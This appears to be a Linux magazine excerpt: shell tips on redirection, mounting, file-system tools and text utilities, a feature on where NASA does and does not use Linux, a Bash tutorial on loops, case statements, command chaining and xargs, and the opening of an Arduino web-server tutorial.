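true && echo "&&: runs because true succeeded"
false && echo "this is never printed"
false || echo "||: runs because false failed"
```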
Record your shell session
Run script and not much will
appear to change, but everything you type and
its output will be recorded to a ile. Press Ctrl+D
when you’re inished and the ile called typescript
will contain a copy of everything you did.
Redirection
Programs normally read input from
the keyboard and send output to the shell. You can
change this with redirection. Adding <somefile
reads input from the file, while >somefile sends
output to the file. >>somefile appends output to
the end of an existing file. > redirects standard
output, while 2> redirects the standard error
channel. With some shells, &> redirects both to
the same destination.
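A quick demonstration in a throwaway directory (the file names are just examples):

```shell
# '>' creates or overwrites, '>>' appends, '2>' captures errors.
cd "$(mktemp -d)"
echo "first"  > out.txt           # create/overwrite out.txt
echo "second" >> out.txt          # append a second line
ls nosuchfile 2> err.txt || true  # the error message lands in err.txt
cat out.txt                       # prints: first, then second
grep -c nosuchfile err.txt        # the error mentions the file name
```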
Learn scripting
These commands are powerful
enough on their own, but really come into their
own when you can run the same command on a
bunch of files, or even several commands, all at
once. Simple shell scripts are easy to write (and
you can dive into making your own by reading
Essential Linux on p38). At their most basic, they
are a simple list of commands to run, one per line.
Put the magic line #!/bin/sh at the top to have it
recognised as a shell script.
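At its simplest, a script looks like this – here we create one, make it executable and run it (the file name is arbitrary):

```shell
# Create, mark executable and run a minimal shell script.
cd "$(mktemp -d)"
cat > hello.sh <<'EOF'
#!/bin/sh
echo "Hello from a script"
uname -s
EOF
chmod +x hello.sh
./hello.sh
```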
Redirect with sudo
Have you tried to write to a system
file with sudo echo something >>somefile only to
have it fail on write permissions? That's because
the redirection is running as your user – sudo only
runs echo. The solution is tee, which outputs to
the terminal and a file at the same time, like this:
echo sometext | sudo tee -a somefile
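You can see what tee does without needing sudo at all – it writes to the file and echoes to the terminal at the same time:

```shell
# tee copies its input to a file *and* to standard output;
# prefixing it with sudo makes only the file write run as root.
cd "$(mktemp -d)"
echo "sometext" | tee -a somefile   # printed and appended
cat somefile                        # proves it reached the file
```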
>_ File systems
Mount and work with internal and external file systems
Mount a file system
The command to mount a file system is:
sudo mount /dev/sdXn /mount/point
…where sdXn is the device node. The mount point
can be anywhere. The file system type is usually detected
automatically, or you can use -t to specify it.
Copy a complete file system with dd
dd if=/dev/sdb3 of=someile.img
…will make a bit-for-bit copy of the disk partition to the
given file. It will be as large as the original partition, so
you may want to pipe the output through a compressor:
dd if=/dev/sdb3 bs=4M | gzip >somefile.img.gz
Another way to mount
If a device is listed in /etc/fstab, you
need pass only the device or mount point to the mount
command and it'll read all other options from fstab. If
fstab contains user or users in the options field, the file
system can be mounted/unmounted by a regular user.
Mounting external drives
Unless a device is listed in /etc/fstab,
you can only mount it as root. You could use sudo,
but might then lose write permissions as a normal
user. Desktop automounters take care of that, as does
pmount on the command line. pmount sdb1 mounts
/dev/sdb1 at /media/sdb1 and, if it is a Windows file
system, makes it owned by the user mounting it.
Check free space
Use df to list the used and available
space on all mounted file systems. It normally reports
space in file system blocks, but adding -h gives
human-readable values. If an ext file system is reporting
no space when df shows there is, use df -i to check for
free inodes.
Flush data to disk
Linux caches disk data, not writing
it immediately. This is faster and also reduces wear
on flash drives. If you want to make sure all data is
committed to disk immediately, run sync. It takes no
arguments and returns when all data is written – which
could be a while if you have just copied a large file to a
flash drive.
>_77 See what is mounted
The mount command with no arguments shows what is
mounted and with which options, but findmnt gives a more readable output.
findmnt's output can also be configured with command-line arguments,
making it a better way of getting such information in scripts.
Mount network drives
This is similar to mounting local drives,
except the device is specified as hostname:/path/to/
mount for NFS mounts and //hostname/path for Samba
mounts or Windows shares. The type is given as -t nfs
or -t cifs respectively.
Repair a damaged file system
If a file system becomes corrupted, you
can try to repair it with fsck:
fsck /dev/sdb3
The file system must not be mounted, which means
you may have to boot from a live CD to run this. If the
contents are important and not already backed up
(why not?), make a copy with dd first.
Clearer list
The df command
provides a
clearer listing
of what is
mounted where
than mount
or indmnt, if
you don’t need
to see all the
mount options.
Add labels to your file systems
When an automounter mounts a
USB stick, it uses the file system's label as the
mount point if there is one. Otherwise it uses
the UUID. You can add a label to an existing file
system – the command is different for each type:
e2label /dev/sdb1 Photos
fatlabel /dev/sdb1 Music
Run either of these without giving a label and it
will tell you the existing label.
Master the terminal
System information
Get information on the contents of your computer
Finding files
Finding one file in a terabyte of data
makes the proverbial haystack look small. The find
command searches your file system like this:
find ~ -iname '*embarrassing_photo*'
The quotes are needed when you use a wildcard.
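Here's the command in action on a small throwaway tree (the names are invented for the demo):

```shell
# Build a small directory tree, then search it case-insensitively.
cd "$(mktemp -d)"
mkdir -p photos/2017
touch photos/2017/Embarrassing_Photo.JPG photos/notes.txt
find . -iname '*embarrassing_photo*'   # matches despite the capitals
```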
>_81 Test your drives’ health
Hard drives have a self-monitoring system called SMART
(you may need to enable this in your motherboard’s BIOS menu). You can
access this with smartctl:
smartctl -i /dev/sda
smartctl -H /dev/sda
smartctl -t short /dev/sda
The first command prints information about your drive, the second reports
its health status and the third runs the short self-test. The tests run in the
background, so you can continue to use the drive.
Sort it
When running a
command that
reports values,
like du, pipe the
output through
sort -h to
list the info in
numerical order.
What’s in the box
You can list the PCI hardware, which
also includes on-board devices, with lspci. Adding
-k shows the kernel driver used for each device. If
your hardware works with one distro but not another,
this should show what is missing in terms of drivers.
Check free space
The du command shows the disk space
used by directories and the files within them, but ncdu
gives a much more friendly display. With no arguments,
it shows the disk usage of the current directory in size
order. Pass it a directory to check elsewhere. You can
drill down through the directories to find the space
hogs. You may want to use the -x option to restrict it to
the current file system.
Check free memory
The command for this is imaginatively
named free. You may want to add the -h option to
see human-readable values – the default of kilobytes
makes no sense these days. Any Linux system that has
been running for a while will show little free memory,
because Linux uses all otherwise unused memory for
caching. free shows this, along with how much memory
you actually have available in the last column.
lspci -k
About the kernel
If your kernel was built with the
CONFIG_IKCONFIG_PROC option enabled, you
can view its entire configuration in the virtual file
/proc/config.gz, so you can see exactly what
hardware and other features have support included.
Listing all hardware
The lshw command outputs a
comprehensive listing of your hardware. It is long, so
pipe it through a pager like less. You can also have
it output HTML, with the -html option, ready for
pasting in a webpage (or even a yucky HTML email).
Faster find
find searches the file system so is not
instant. locate uses a database of all files on your
system, updated daily by a cron job. It is much faster,
and doesn't need wildcards, but is not completely up
to date. If you need to update before a search, run
updatedb as root, ideally with sudo.
Brief OS information
Use uname to report one or more of the
kernel version, OS, hostname, CPU type and more. Print
the lot with uname -a or specify individual components
to report on. The output is terse and particularly useful
when scripting.
Really detailed information
Install and run inxi to see a lot of
detail on your system. The default output is brief,
but you can increase this with -v followed by a
number up to 7, or you can tell it to show information
on particular subsystems.
A few more...
Various handy tips and commands to use in your shell
Wildcards
Use wildcards to match multiple
files. To copy photos in the current directory, use
cp *.jpg dest/
* matches any sequence of characters except /,
? matches a single character.
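For example, in a throwaway directory:

```shell
# '*' matches any run of characters, '?' exactly one.
cd "$(mktemp -d)"
touch a.jpg bb.jpg c.png
mkdir dest
cp *.jpg dest/     # copies a.jpg and bb.jpg, but not c.png
ls dest
echo ?.jpg         # only a.jpg has a single-character name
```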
Handling tarballs
If tarballs (file archives) have an
extension after the .tar, they're compressed, but
the tar command can still handle them.
tar tvf tarball.tar.bz2
tar xf tarball.tar.xz
The first command lists the contents of a tarball;
the second unpacks it to the current directory.
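To try the whole round trip safely (the archive and file names are just examples):

```shell
# Create a compressed tarball, list it, then unpack it elsewhere.
cd "$(mktemp -d)"
mkdir src && echo "data" > src/file.txt
tar czf archive.tar.gz src          # c=create, z=gzip, f=file name
tar tf archive.tar.gz               # t=list the contents
mkdir unpack && tar xf archive.tar.gz -C unpack   # x=extract into unpack/
cat unpack/src/file.txt
```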
Windows ZIP files
View the contents of a ZIP archive
with unzip -l;
drop the -l to unpack it.
Search a file
grep searches files for lines
matching a given pattern. To look for error
messages in a log file, you could use:
Counting content
wc somefile ...
…will report the numbers of lines, words and characters
in each of the files it is given, or from standard input,
along with the total for all files. Use -c, -w or -l if you
are interested in only one of those values.
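For instance:

```shell
# Count lines in a file, then the same data via standard input.
cd "$(mktemp -d)"
printf 'one two\nthree\n' > somefile
wc -l somefile     # prints the count and the file name
wc -l < somefile   # stdin: prints just the number
```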
Reading standard input
Many commands will accept standard
input via a pipe in place of a file to work on if no
filename is given. Many also accept - as a filename,
which means to read from stdin. The latter has the
advantage that a program can read from both standard
input and one or more files.
Back it up
When using the
-i option with
sed to modify
files in place, use
-i.bak to create
a backup of the
original file.
Changing file contents
The Stream EDitor sed is used to edit
streams of text. It is extremely powerful but can also be
used for simple tasks like search and replace. It works
on files or with text on standard input, hence the name.
To replace all occurrences of foo with bar in a file, you
would use:
sed -i s/foo/bar/g somefile
The -i option replaces the file with the changed version
instead of simply outputting the changed data.
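A safe demonstration, using the backup-file trick from the sidebar:

```shell
# Replace every 'foo' with 'bar' in place, keeping a .bak backup.
cd "$(mktemp -d)"
printf 'foo one\nfoo two\n' > somefile
sed -i.bak 's/foo/bar/g' somefile
cat somefile       # now: bar one, bar two
cat somefile.bak   # the untouched original
```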
grep -i err logfile
grep is case sensitive by default; -i changes that.
Viewing the beginning or end of a file
The head and tail commands show the first or
last ten lines of a file. The -n option can be used to
view a different number of lines.
tail -n 1 somefile
>_100 What is a file?
file file1 file2 ...
Linux doesn't use file extensions to distinguish
between file types, but looks at the contents. The file command will tell
you what type of data a file contains, and often more – like the
dimensions of an image.
Linux in Space
Linux is key to much of NASA’s space exploration but, paradoxically, its
influence isn’t universal, as Mike Bedford reports
NASA was in the news again earlier this year
as Juno, its space probe in orbit around
Jupiter, flew within just 9,000km of the
giant planet’s cloud tops. Of particular
interest were impressive and detailed images of the
Great Red Spot, the turbulent storm, 1.3 times the
diameter of the Earth, which scientists think might have
raged for over 350 years.
Meanwhile, 550 million kilometres away, the Mars
rover Curiosity has just celebrated the fifth anniversary
of its touch-down on the surface of the Red Planet.
While not as much in the public eye as it was back
in 2012, this miracle of astronautical engineering
continues to return eye-catching photos and enough
data to keep scientists busy for many years to come.
Designing these and NASA’s many other spacecraft,
some of which are even more distant from the Earth,
planning and operating their missions, and processing
the imagery and data they generate, requires some
major computing resources. As users of high-performance computers, and especially for science and
engineering applications, you might reasonably expect
that NASA would be first and foremost a Linux user.
And while NASA is, indeed, a major user of our favourite
operating system, it would be wrong to suggest that
Linux enjoys universal support at America’s space
agency. Here we look at where Linux is used and why and, perhaps even more intriguingly, at the applications where it doesn’t get a look-in, and the reasons for this apparent drop-off.
NASA has some serious computing muscle at its beck and call, but the scale of those resources might be something of an eye-opener. Based at the Ames Research Center at Moffett Field in California’s Silicon Valley, NASA’s Advanced Supercomputing division (NAS) has not one but four supercomputers. Top spot goes to Pleiades, named after a star cluster in the constellation of Taurus; with over a quarter of a million Intel Xeon cores, it achieves petascale computing (in excess of one quadrillion floating point operations per second), and boasts 15th place in the Top 500 list of the world’s fastest computers. Since Linux is so dominant in the world of supercomputing, these facilities rely squarely on it. Benefits cited by users of high-performance computing facilities include Linux’s modular nature, its scalability, community support and low cost.

Juno Cam
NASA is publishing raw images from its Juno spacecraft, now orbiting Jupiter. Download them, process them – for example, by adding your own colour – and share your results.

Advanced supercomputing division
As a facility available to all NASA’s departments, the phenomenal computing power at NAS is brought to bear on a staggering array of different applications. One that has been gaining more public appreciation in recent years is the search for exoplanets – that’s planets beyond our solar system – and, in particular, for ones that are within the habitable zone around their star and might, therefore, be capable of hosting life. This isn’t the place to discuss the intricacies of how these planets are detected but, given the almost unimaginable numbers of stars in the sky, it’s clear that this is akin to searching for the proverbial needle in a haystack, a job that only the fastest computers can tackle.
Since NASA is, perhaps, best known for its manned and unmanned space exploration programmes, another key application of the computing facilities at the Ames Research Center is during the design of spacecraft. Indeed, all recent missions have involved putting the spacecraft through their paces before they’re ever built. One of NASA’s current high-profile projects is the
development of the Space Launch System (SLS) and
associated Orion capsule. NASA has been without any
means of putting a human into Earth orbit since 2011
when the Space Shuttle Atlantis made its final flight.
SLS and Orion are aimed to provide a manned space
flight capability once again, even though it’s likely to
be 2021 or later before they first take humans into
space. But while the Saturn V rocket and Apollo that
took man to the Moon went from concept to first flight
in a little over seven years, these new spacecraft will
have undergone a ten-year development programme,
enough time to carry out the most stringent tests. An
important part of that testing regime is simulation
by computational fluid dynamics (CFD). Running on
the Pleiades supercomputer, CFD software is
tasked with analysing the flow of air
and exhaust gases around all
parts of the spacecraft
to study, among other things, aerodynamic performance, temperature distribution, and forces. In a recent press release, NASA indicated that this work, on the SLS alone, had consumed 20 million core hours of computing time over two years.

Above Simulating the aerodynamic forces on the SLS rocket, during separation of the solid fuel boosters, on the Pleiades supercomputer

Linux in orbit
NASA’s use of Linux isn’t restricted to its supercomputing facilities. Indeed, in 2013 the space agency heralded a major shift in policy on the International Space Station (ISS). The dozens of laptops on board the ISS were to be migrated from Windows XP to Debian Linux. Keith Chuvala of NASA contractor the US Space Alliance explained the rationale for the shift. “We migrated key functions from Windows to Linux because we needed an operating system that was stable and reliable – one that would give us in-house control”, he said. “So if we needed to patch, adjust or adapt, we could.” It’s also pertinent to point out that, during its Windows era, laptops on this platform orbiting 400km above the Earth’s surface were infected by a virus, reportedly brought on board on a Russian cosmonaut’s laptop. We might reasonably expect this to be a far less likely eventuality in the new Linux era.
As well as routine housekeeping jobs, laptops on board the ISS are used for a whole host of scientific applications. In fact, conducting orbital research is one of the main tasks for the crew. NASA lists literally thousands of experiments that have been carried out on board the ISS, mostly falling into the categories of biology and bioengineering, Earth and space science, educational activities and outreach, human research, physical sciences, and technological development and demonstration. Given that these experiments will have mostly been devised by academics outside NASA, this preference for Linux isn’t at all surprising. It’s also interesting to note that Robonaut 2, the humanoid robot that is being put through its paces on board the ISS, runs an embedded version of Linux on its 38 PowerPC-based processors. According to NASA, the robot isn’t only used for research but could also play a part in the operation of the space station. Thanks to its humanoid design, Robonaut 2 can take over simple, repetitive or particularly dangerous tasks in places such as the ISS. Since Robonaut 2 is approaching human dexterity, tasks such as changing out an air filter can be performed without modifications to the existing design.

Right NASA’s Robonaut 2 humanoid robot, currently flying on board the International Space Station, has an embedded version of Linux at its core

NASA has asked Boeing to develop a computer for possible use on board spacecraft that uses a radiation-hardened ARM processor and can run both UNIX and Linux in parallel.

No-go areas
Despite the glowing picture of Linux in NASA, there are several areas of the organisation’s activities where Linux doesn’t get a look-in and places it’s not allowed to go. In some cases, the reason is obvious and unequivocal (see The Voyager Experience box). In other areas, though, while a decision to spurn Linux might not be as clear-cut, it’s a perfectly reasonable choice.
When radio signals can take minutes or hours to reach
a spacecraft, as will be the case with probes that are
well beyond Earth orbit, those spacecraft can’t rely on
minute-by-minute commands from Mission Control. So
while NASA is able to transmit high-level commands, the
spacecraft have to be capable of autonomous operation
in many areas. This means that tasks have to process
data in a timely and predictable manner, which is the job
of a real-time operating system (RTOS). Commonly, such
operating systems have been designed from the ground
up to meet this requirement and, although there are real-time variants of Linux, these are few and far between and
at least one commercial offering has been discontinued.
It’s not surprising, therefore, that when NASA needed
an operating system for the Mars Curiosity Rover, it
took the decision to use the same operating system that
had proved itself on the earlier Spirit and Opportunity
Martian robots: the VxWorks RTOS from Wind River.
Indeed, VxWorks has flown on NASA missions for over
two decades.
This culture of conservatism is endemic at NASA
and not without some justification, given the huge
cost of failure. That Curiosity rover, for example, cost
$2.4 billion and represented eight years of work before
it ever landed on the Red Planet. Such a high price tag
is by no means unique. The Cassini-Huygens mission to
Saturn and its moon Titan cost $3.26 billion, while the
International Space Station has cost $160 billion to date,
making it the single most expensive man-made object.
It’s understandable, therefore, that there’s a preference
for the tried-and-tested solution wherever possible.
And it’s not as if it’s easy to swap out the software on
a spacecraft a few hundred million miles away. As one
commentator put it, upgrading the operating system
would be like changing the tyre on a car while driving
down the motorway at 70mph.
But while the ‘belt and braces’ philosophy is unlikely
to be superseded at NASA any time soon, and this will
influence the choice of operating system on far-flung
space probes, the same doesn’t apply to the software
that interfaces with them here on Earth. Although the
Curiosity rover might be running a proven if somewhat
dated operating system on the Martian surface, back
at NASA’s Jet Propulsion Lab in Pasadena, California,
Linux is at the fore. Pride of place here goes to The
Rover Sequencing and Visualization Program (RSVP)
which provides the operators with information on the
Martian terrain and Curiosity’s status. It can then rapidly
assemble command sequences and test them out by
simulation, before uploading them to the rover on Mars.
So Linux is alive and well on NASA’s computers here
on Earth but, so far, the furthest into space it’s been
employed is in the International Space Station’s low Earth
orbit. All that might be about to change, you might think,
when the Orion programme takes to the skies with its
The Voyager Experience
Between them, the two Voyager spacecraft have
visited all the outer planets – Jupiter, Saturn,
Uranus and Neptune – and many of their moons.
Both are now heading into interstellar space;
Voyager 1 became the first man-made object
to leave the solar system in 2012, and is now
13 billion miles away. Amazingly, it’s still in
contact with NASA. And, just in case they are ever
found by extra-terrestrials, each craft carries a
gold disc containing sounds and images portraying
the diversity of life and culture on Earth.
Despite representing one of NASA’s most
successful space programmes, the Voyager
probes do not run Linux. The reason is clear
to see. By the time you read this, the Voyager
spacecraft will have been in space for 40 years.
Linux, on the other hand, is just 25 years old.
potential to take man back to the Moon and even to Mars.
But no: already, this new spacecraft is locked into a flight
computer that was designed in 2002 for use on the Boeing
787. It has somewhat archaic hardware, because of the
requirement for radiation-hardened processors to survive
the rigours of space, so it doesn’t run Linux. However,
given that laptops are an essential part of life on the ISS,
and that those laptops run Linux, might there just be a
possibility, when Orion first takes to the sky, that on-board laptops might represent Linux’s final frontier?
Above Since 2013, when
Windows was ousted,
the dozens of laptops
on the International
Space Station all run
Debian Linux
Tiny satellites
CubeSats are tiny
satellites that are
so cheap to build
that they’ve even
been produced
by amateurs,
who were able to
hitch a ride into
orbit. Commonly
they run Linux.
Essential Linux
Master shell scripting:
More tricks to try in Bash
is a university tutor
in Programming
and Computer
Science. He likes
to install Linux on
every device he can
get his hands on,
and uses terminal
commands and
shell scripts on a
daily basis.
A terminal
running the Bash
shell (standard on
any Linux distro)
We explore more constructs and commands that help
shell scripting act as a fully fledged programming language
Last month, we saw that Bash scripting can be used as
a specialised programming language. Bash scripting is
very rich in features, and we met conditionals, variables,
for loops, command-line arguments and functions.
This month, we’ll be continuing where we left off. Bash
scripting supports still more programming constructs,
including while loops and case statements. We’ll also be
meeting sophisticated ways of chaining and grouping
commands, which are particularly powerful when
combined with the pipelines that we met in the first
article in the series. We learned last month that every
command, script and function in a Bash script returns
a numerical exit code, and this fact will be important
throughout the article this month.
Last, we’ll meet a few new useful commands that we
can use in our scripts.
By this point, you should be feeling fairly comfortable
with shell scripts, and you should make the effort to start
writing scripts yourself to speed up commonly performed
tasks. There is a very rich range of command-line tools
that you can use in your scripts: for example, you can use
the program xdotool to perform key presses and mouse
clicks automatically. We’ll be drawing the focus more
towards real-life applications of shell scripting starting
from this article.
In the last issue, we explored the fact that every
program, function or shell script in Linux exits with a
numerical exit code, where 0 denotes normal exit and any
other number indicates an exit that is unusual in some
way. We met the command read, which reads a line of
text from standard input into a variable. read normally
exits with a code of 0, but it exits with a code of 1 when
it encounters the end-of-file character, either because it
has reached the end of the input file or because a user
has pressed Ctrl+D at the console.
This exit code behaviour makes it easy to write
scripts that repeatedly read a line of text and perform
some action on it. To do this, we use the while-loop
construct that is available in Bash. While loops in Bash
behave in a similar way to how they behave in other
languages: in Bash, a while loop takes a command as
input and then continually executes its body until that
command returns an exit code other than 0. For example:

while read line
do
    echo "You typed: $line"
done

This script reads in input from the user and prints it out
with the prefix ‘You typed:’. It will continue to run until
the user presses Ctrl+D (or it reaches the end of an input
file), at which point the command read will exit with code
1 and the while loop will end.

Below While-loops and case statements are commonly used in production-level shell scripts

Tutorial files
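To try the loop without typing at the console, input can be piped in; the end of the piped input triggers the same non-zero exit from read as pressing Ctrl+D would (the sample lines are invented):

```shell
# read succeeds for each piped line, then returns non-zero at end of input,
# which ends the while loop.
printf 'hello\nworld\n' | while read line
do
    echo "You typed: $line"
done
```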
A very similar keyword in Bash is until. This behaves
exactly like while, but now it executes its body while the
command’s exit status is not 0.
For example, your author uses a command-line tool
called netctl to connect to the internet. The connection
is poor, and sometimes goes down without a reason.
In that case, if we try to connect to the network using
netctl, the program prints an error message and exits
with an exit code of 1. Sometimes we want to tell the
computer to keep on trying to connect to the network
until it is successful. In that case, we can use an
until loop:

until sudo netctl start my_network
do
    sleep 5
done
The loop will run until the netctl command succeeds in
connecting and returns an exit code of 0. The sleep 5
command in the body of the loop (which pauses execution
for 5 seconds) isn’t really necessary – we could have used
the ‘empty command’ : instead – but if we don’t manage
to connect now, then it’ll probably be at least 5 seconds
till we can connect again, so it makes sense to allow the
CPU to do other things during this time.
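The same until pattern can be rehearsed without a network at all by swapping netctl for a stand-in function that fails a fixed number of times (the function and its name are invented for illustration):

```shell
# attempt_connect stands in for a flaky command such as netctl:
# it fails (exit code 1) until the third call, then succeeds (exit code 0).
attempts=0
attempt_connect() {
    attempts=$((attempts + 1))
    [ "$attempts" -ge 3 ]
}

until attempt_connect
do
    :    # the 'empty command'; a real script might sleep here instead
done
echo "connected after $attempts attempts"
# prints: connected after 3 attempts
```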
Case statements
The last ‘control’ structure that we will meet is the
case statement. If you have programmed in C or
related languages, you might be familiar with the
switch‑case structure; this is the Bash equivalent.
It is a slightly cleaner alternative to an if…elif…else…
fi block if you find yourself with a variable that could
take on multiple values, and you want your program to
execute different code depending on which value the
variable holds.
For example, we might write a script that takes a
command-line argument. This argument could be run,
to run the main code, test to run tests, or help to print
a help message. In that case, the code in Figure 1 will do
what we want.
Let’s examine this code in a bit more depth. The first
line, case $1 in, means that we are branching based
on the value of $1, the first command-line argument.
This is followed by a succession of case branches, each
consisting of a case pattern and some lines of code. For
example, if the command-line argument is run, then that
Figure 1
case $1 in
    run)
        # run the main code
        ;;
    test)
        # run the tests
        ;;
    help)
        # print a help message
        ;;
    *)
        echo "Invalid argument."
        echo "Please use 'run', 'test' or 'help'."
        ;;
esac
Above Case statements are commonly used to decide what to do based on a
command-line argument
will match the first branch, and Bash will run the code in that branch.
The pattern arguments run, test and help are
followed by a close bracket ), which delimits them from
the code that we want to run. In this case, we have
matched on simple strings, but we can match globs, e.g.:
case $1 in
    test*)
        # ...
        ;;
esac
Exit codes
…would run the tests if the user typed in any word
beginning with ‘test’ at the command line, such as test1
or testimony. In the example in Figure 1, we have used
the glob *) to match any remaining strings. This is a bit
different from languages like C, where the input variable
has to match exactly one of the case branches. In Bash,
the first case branch to match the string is executed, so
the branch starting *) won’t be run unless the command-line
argument does not match any of the other branches.

Every time a
command-line program
reads input from the
console, it can take input
from another program
We can also use the pipe character ‘|’ to signal an
either-or. So, run|test) will run the case branch if the
user types either run or test.
The last part of the case branch is the double
semicolon ;; which marks the end of the branch.
While-loops in Bash
use exit codes in
order to determine
whether or not
to run another
iteration. In fact,
conditionals (if
statements) work
according to
exactly the same
mechanism: the
conditions of the
form [[ a -lt b ]] and
so on that we met
last time can in fact
be run directly as
programs – they
return an exit code
of 0 or 1 depending
on whether the
condition is true
or false. This
means that you
can use the same
conditions in while
loops as well.
Conversely, you
can use actual
programs as
conditions in your
if statements.
Command line vs GUI
If you are used to
programming in an
IDE, then it might
seem strange to
use a command-line debugger, but it
has its advantages,
as we can see.
Though it’s always a
good idea to use an
IDE for complicated
languages such as
Java, editors and
the command line
are a very effective
environment for
programming in
small languages
such as C. Thanks
to the shell
mechanism, every
command-line tool
is automatically
scriptable. With a
graphical program,
you can only
automate things
if the developer
has built in that capability.
In order to terminate the case statement, we use the
keyword esac.
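Pulling the pieces together – patterns, the | alternator, a glob branch, ;; and esac – here is a small runnable sketch (the function name and messages are invented for illustration):

```shell
# classify prints a different word depending on the first matching branch.
classify() {
    case $1 in
        run|test) echo "action" ;;    # | separates alternative patterns
        help*)    echo "help" ;;      # glob: any word beginning with 'help'
        *)        echo "invalid" ;;   # catch-all branch
    esac
}

classify test      # matches run|test
classify helpme    # matches the glob help*
classify foo       # falls through to *
```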
More pipes: the yes command
When we introduced pipes, we might have given the
impression that they are only useful for special programs
that take in input line-by-line, but this is not the case.
Every time a command-line program reads input from the
keyboard, it is reading from stdin and can therefore take
input from another program.
As an example of this, many package managers (e.g.,
APT, YUM, Portage, Pacman) prompt the user to type Y
for yes before installing software:
$ sudo apt-get install gnome
[ … ]
Do you really want to install this
software? [Y/n]
If installing multiple pieces of software, you might want
to automate this so that you do not have to press Y every
time. Luckily, Linux provides a command that will help
you do this. The command is called yes, and all it does is
print out the letter y until you force it to stop with Ctrl+C:
$ yes
That means that you can skip confirmation by piping the
output from yes into your package manager:
$ yes | sudo apt-get install gnome
[ … ]
Do you really want to install this
software? [Y/n] y
[ … ]
Below We often use
the tail command to
display the last (most
recent) lines of a log file
Here, the affirmative y is printed automatically. Since
yes prints out y infinitely often, this will continue to
work however many times the program prompts us
for confirmation.
If we want to print out something other than y, we can
pass it to yes as a command-line argument: yes linux
will print out linux until it is forced to stop.
Making head and tail of things
Two commands that are sometimes useful are head and
tail. head prints out the first few lines of input, while
tail prints out the last few. For example:
$ yes | head -n5
Here, the command-line switch -n5 tells head to print out
the first 5 lines of input.
$ < /usr/bin/startx tail -n2
exit $retval
In this case, tail ‑n2 prints out the last 2 lines of the file
/usr/bin/startx, a script that sets up the X windowing
system on some Linux distributions.
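head also provides a safe way to sample the otherwise endless output of yes from the previous section:

```shell
# yes repeats its argument forever; head keeps only the first three lines,
# and yes stops once head closes the pipe.
yes linux | head -n3
# prints 'linux' three times
```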
Exercise: Run the commands head ‑n5 and
tail ‑n5 without piping. What is the difference in
the way these two commands operate? Why is this
difference necessary?
Chaining commands
A common way to distribute Linux programs is as a
source package with a Makefile. In order to install the
package, the user has to do three things: run a script
called configure, which checks system details that will
be relevant to the installation, then run the command
make to compile the code, and lastly run make install to
install the software on their system. In order to automate
this, we might write a script as follows:
./configure
make
make install
However, this isn’t quite right, since each of these three
steps is prone to failure. If either the configure stage or
the make stage fails, then we don’t want the rest of the
steps to run.
To deal with cases like these, Bash provides the double
ampersand operator &&, which can be used to chain
commands together. The second command will only run if
the first one exits with code 0. So we can write our script
instead as:
./configure && make && make install
This way, if the configure script fails and exits with a non-zero
exit code, the remaining steps will not run.
The opposite operator to && is the double pipe operator
||. This time, the second command will run only if the
first command terminated with a non-zero exit code:
mkdir tmp || echo "Failed to create tmp"
The third way to chain commands is using a semicolon
;. This is no different from writing the commands on
separate lines as we normally do, but it is sometimes
useful to put multiple commands on the same line:
$ echo hello; echo world
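The three operators can be compared side by side using true and false, which simply exit with code 0 and 1 respectively:

```shell
true && echo "second command ran"    # && runs the second command on success
false || echo "fallback ran"         # || runs the second command on failure
echo one; echo two                   # ; runs both, whatever the exit codes
```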
Grouping commands
Sometimes it is useful to group multiple commands
together as though they were acting as one command,
particularly when we are using pipes. As an example,
the program GDB is a command-line tool that is very
commonly used for debugging C and C++ programs. GDB
starts up its own prompt and accepts certain commands.
For example, the command break sets a breakpoint at
a line of code, n skips to the next line, and the command
print can be used to print out the values of variables and expressions within the program.
While debugging a program, we sometimes find ourselves having to go through the same steps over and over again. While we can avoid some of this by using breakpoints effectively, we can also speed things up using shell commands. For example, suppose that every time we start GDB we set a breakpoint on line 100, print the value of a variable xyzzy, then skip through 100 lines of code (for example, to iterate a few times through a loop) and then hand control back to the terminal. Then we could use the following command:

{ echo 'break 100'; echo 'run'; echo 'print xyzzy'; yes 'n' | head -n100; cat; } | gdb

The commands we run are all ones we have met before. The echo commands at the beginning pass commands directly into GDB. The yes command piped through head sends the command n to GDB 100 times and, last, the cat command hands control back to the console. The only new bit of syntax is the curly brace construct. Putting commands in between curly braces causes them to be run sequentially as one command. It is very important that you leave a space after the opening brace and another before the closing brace; otherwise this will not work. The semicolon after the final command is also essential.

Above Command-line debugging tools, such as GDB, have an important advantage over graphical versions: they are fully scriptable

Using xargs
We will meet one final very useful command. You might have noticed that a number of shell commands, including touch, mkdir, echo, rm and cat can take a number of arguments at the command line. For example, touch file1 file2 creates two new files called file1 and file2. This works well when we are typing at the command line or using globs.
Suppose, however, we’ve been sent a files_for_deletion file containing a list of other files which need to be deleted. We could delete them all using a while loop:

while read file
do
    rm "$file"
done < files_for_deletion
However, this spawns a separate instance of rm for
each file on the list: we would like to call one instance
of rm, but with all the different filenames as command-line arguments.
The command we use to do this is called xargs, and it
converts line-separated input from standard input into
a list of command-line arguments. In this case, we could
call it using the following command:
< files_for_deletion xargs rm
We can use xargs with pipes as well. For example, to
delete all files in the current directory that match the
pattern windows, you could run:
ls | grep windows | xargs rm
Note that this will not work properly if some of your
filenames contain newline characters.
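The whole pattern can be rehearsed safely in a throwaway directory created with mktemp, so no real files are at risk:

```shell
# Create three files in a scratch directory, then delete them with a
# single rm invocation whose arguments are built by xargs.
scratch=$(mktemp -d)
cd "$scratch"
touch file1 file2 file3
ls | xargs rm
ls | wc -l    # 0: the directory is now empty
```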
Create your own HTTP server
powered by Arduino
is a computational
physicist. He
teaches Arduino to
grad students and
discourages people
from doing lab
work manually.
Arduino board:
Uno, Leonardo or
Arduino IDE
Ethernet & SD
Available in many
online stores
microSD card
A basic text editor
Arduinos are designed for hardware, but the right model can
still power through a lot of computing
Establishing an online presence is a task easily
accomplished with a personal website. While websites
are a great platform to showcase your skills, there’s
no reason we can’t show off our Arduino prowess and
avoid paying money to host content on a server at the
same time. This month we are going to begin a series of
Arduino tutorials that take the microcontroller board out
of its comfort zone and we start by transforming it into a
simple HTTP web server.
Alarm bells should be ringing in your head right now:
aren’t Arduinos meant for hardware projects? Well, yes,
mostly. Arduinos also have a maximum program size
and a relatively small amount of memory, making this
difficult. We could also do this cheaply with an actual,
albeit small, computer such as the Raspberry Pi. We also
won’t be able to do much (if any) server-side processing
– so no database queries. These are three strong
arguments against using an Arduino for this. However,
if you have an Arduino Yún then this isn’t the case at all,
and if you have a Mega the program size isn’t an issue
and extra features can be added as needed.
The benefit of using an Arduino and programming your
own server is that you can also serve other commands
of your choosing. This allows your web server to double
up as an IoT device, controlling items around your home.
